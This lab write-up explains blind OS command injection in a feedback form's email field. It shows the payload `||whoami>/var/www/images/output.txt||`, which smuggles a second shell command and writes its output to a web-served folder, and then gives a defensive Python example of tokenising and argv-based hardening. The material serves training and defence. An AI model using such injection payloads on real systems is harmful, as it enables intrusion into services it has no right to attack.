
# 03 Lab: Blind OS command injection with output redirection

## Objective

> This lab contains a blind OS command injection vulnerability in the feedback function.
>
> The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
>
> ```
> /var/www/images/
> ```
>
> The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.
>
> To solve the lab, execute the `whoami` command and retrieve the output.

## Solution

> We assume the feedback functionality is implemented using the following script:

```bash
mail -s "This site is great" -a From:peter@normal-user.net feedback@vulnerable-website.com
```

1. We test the Feedback section through Repeater, looking at the `email` field.

   ![image.png](/files/XjIVoq22Xt7HpF3zRMBn)
2. We add `||whoami>/var/www/images/output.txt||` to the `email` field, with the space at the beginning, to append an extra instruction.

   The executed command ends up as follows, which causes a file to be written. Remember that we must choose a correct path or file; in addition, we know the directory is writable:

   ```bash
   mail -s "This site is great" -a From:peter@normal-user.net feedback@vulnerable-website.com ||whoami>/var/www/images/output.txt||
   ```

   ![image.png](/files/YUMYzbAlT8qnL7ARD6na)

   ![image.png](/files/5QqUfHkNyATahTK1Xp9R)

   ![image.png](/files/0wc1cSS8TcLizLCwU3XZ)
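
From the defender's side, the root cause is that the `email` value is concatenated into a string that a shell then parses. The following is an added example, not part of the original write-up or the lab's code: it tokenises the assumed `mail` command the way a POSIX shell would to show which operators the user input introduces, next to a hardened form that validates the field and builds an argv list. The function names and the `EMAIL_RE` allow-list are assumptions made for illustration.

```python
import re
import shlex

# Constructed values mirroring the mail command assumed on this page.
SUBJECT = "This site is great"
RECIPIENT = "feedback@vulnerable-website.com"
SHELL_OPERATORS = {"|", "||", "&", "&&", ";", ">", ">>", "<"}

# Conservative allow-list for the email field (an assumption, not full RFC 5322).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def vulnerable_command(email):
    """Pattern the lab describes: user input concatenated into a shell string."""
    return f'mail -s "{SUBJECT}" -a From:{email} {RECIPIENT}'


def injected_operators(command):
    """Tokenise like a POSIX shell and return control/redirection operators."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return [tok for tok in lexer if tok in SHELL_OPERATORS]


def safe_argv(email):
    """Hardened form: validate first, then build an argv list.

    Passed to subprocess.run(argv) without shell=True, no shell parses the
    value, so operators in it would stay inside a single argument.
    """
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("invalid email address")
    return ["mail", "-s", SUBJECT, "-a", f"From:{email}", RECIPIENT]


if __name__ == "__main__":
    # The value used in step 2 of this page, and a benign address.
    for value in ("||whoami>/var/www/images/output.txt||", "peter@normal-user.net"):
        ops = injected_operators(vulnerable_command(value))
        print(f"{value!r}: shell operators introduced = {ops}")
        try:
            print("  argv:", safe_argv(value))
        except ValueError as exc:
            print("  rejected:", exc)
```

Nothing in the block executes `mail`; it only builds and inspects the command, so it can be run anywhere.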
